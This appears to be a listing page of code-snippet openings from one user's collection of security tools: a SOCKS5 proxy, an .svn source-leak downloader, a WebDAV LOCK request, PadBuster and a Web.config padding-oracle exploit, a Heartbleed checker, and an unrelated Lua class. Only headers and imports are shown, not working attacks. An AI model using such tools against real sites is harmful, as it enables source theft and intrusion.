JnuSimba

#!/usr/bin/python 
# Filename s5.py 
# Python Dynamic Socks5 Proxy 
# Usage: python s5.py 1080 
# Background Run: nohup python s5.py 1080 & 
# Email: ringzero@557.im 

import socket, sys, select, SocketServer, struct, time 

class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass

JnuSimba

#include <sys/time.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdio.h>

JnuSimba

#define _CRT_SECURE_NO_DEPRECATE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <winsock2.h> 
#include <io.h>
#include <signal.h>
#pragma comment(lib, "ws2_32.lib")
#define VERSION                        "1.10"
#define TIMEOUT                        300

JnuSimba

#!/usr/bin/php -q
<?php
/**
 * 本脚本用于下载.svn目录未作权限限制的网站源码,适用于现有的各种svn版本.
 * 请用php5.3+来运行本脚本.想支持更低版本,请自行修改源码.不必通知我.
 * 作者：小雨@乌云
 * http://蛋疼.com
 * changelog:
 * 2.1 2012-3-28
 * .svn不成功时尝试使用_svn目录

JnuSimba

import urllib2,os,re,sys
argvs=sys.argv

url=argvs[1]
path=argvs[2]

listurl=[]
def getpath(url):
    try:
        c=urllib2.urlopen(url+'/.svn/entries').read()

JnuSimba

LOCK /1.vbs HTTP/1.1
Host: localhost
Timeout: Infinite, Second-4100000000
Content-Type: text/xml; charset="utf-8"
Content-Length: 257
Authorization: Digest username="user",realm="user@contoso.com", nonce="...",uri="/1.vbs",response="...", opaque="..."

<?xml version="1.0" encoding="utf-8" ?>
<d:lockinfo xmlns:d="DAV:">
  <d:lockscope><d:exclusive/></d:lockscope>

JnuSimba

#!/usr/bin/perl
#
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
# Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com)
#
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
# to James M. Martin (research@esptl.com) for sharing proof of concept exploit
# code for performing various brute force attack techniques, and wireghoul (Eldar 
# Marcussen) for making code quality improvements.  

JnuSimba

# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
 
#!/usr/bin/perl
#
#
#  Webconfig Bruter - exploit tool for downloading Web.config
#
#  FOr use this script you need Pudbuster.
#  Padbuster is a great tool and Brian Holyfield deserve all the credits.
#  Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.

JnuSimba

#!/usr/bin/python

# Hut3 Cardiac Arrest - A script to check OpenSSL servers for the Heartbleed bug (CVE-2014-0160).
#
# DISCLAIMER: There have been unconfirmed reports that this script can render HP iLO unresponsive.
# This script complies with the TLS specification, so responsitivity issues are likely the result
# of a bad implementation of TLS on the server side. CNS Hut3 and Adrian Hayter do not accept
# responsibility if this script crashes a server you test it against. USE IT AT YOUR OWN RISK.
# As always, the correct way to test for the vulnerability is to check the version of OpenSSL
# installed on the server in question. OpenSSL 1.0.1 through 1.0.1f are vulnerable.

JnuSimba

Vector = {}
Vector.__index = Vector

function Vector.__add(a, b)
  if type(a) == "number" then
    return Vector.new(b.x + a, b.y + a)
  elseif type(b) == "number" then
    return Vector.new(a.x + b, a.y + b)
  else
    return Vector.new(a.x + b.x, a.y + b.y)